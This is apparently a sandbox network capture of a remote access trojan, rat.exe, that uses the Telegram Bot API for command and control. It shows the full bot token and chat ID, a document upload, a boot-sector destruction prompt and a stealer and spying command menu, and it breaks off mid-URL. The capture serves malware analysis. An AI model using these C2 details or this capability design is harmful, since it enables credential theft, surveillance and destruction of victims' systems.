Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:52 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:53 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:54 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:55 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:56 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:57 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:58 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:59 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:00 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:01 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:03 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:04 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:05 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:06 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:07 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:08 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:09 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506679 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:10 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506680 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:11 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506681 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:12 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506682 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506683 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:14 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506684 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:15 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506685 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:17 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506686 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:18 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506687 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506688 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506689 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:21 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506690 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506691 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506692 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:24 GMT
Content-Type: application/json
Content-Length: 384
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%92%8A%20Warning!%20System%20will%20be%20destroyed!%20Run%20command%20/OverwriteBootSector_CONFIRM%20to%20continue.

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%92%8A%20Warning!%20System%20will%20be%20destroyed!%20Run%20command%20/OverwriteBootSector_CONFIRM%20to%20continue. HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:21:24 GMT
Content-Type: application/json
Content-Length: 410
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
POST

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendDocument?chat_id=-4791200354

rat.exe

Remote address:

149.154.167.220:443

Request

POST /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendDocument?chat_id=-4791200354 HTTP/1.1
Content-Type: multipart/form-data; boundary="eb467752-005a-44c6-8ebc-1ab000514183"
Host: api.telegram.org
Content-Length: 1092
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:27 GMT
Content-Type: application/json
Content-Length: 438
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

133.111.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.111.199.185.in-addr.arpa

IN PTR

Response

133.111.199.185.in-addr.arpa

IN PTR

cdn-185-199-111-133githubcom
DNS

8.162.23.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.162.23.2.in-addr.arpa

IN PTR

Response

8.162.23.2.in-addr.arpa

IN PTR

a2-23-162-8deploystaticakamaitechnologiescom

149.154.167.220:443

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677

tls, http

rat.exe

27.8kB
63.7kB
217
125

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%8D%80%20Bot%20connected

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506641

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506642

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506643

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506644

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

HTTP Response

200

HTTP Request

GET https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/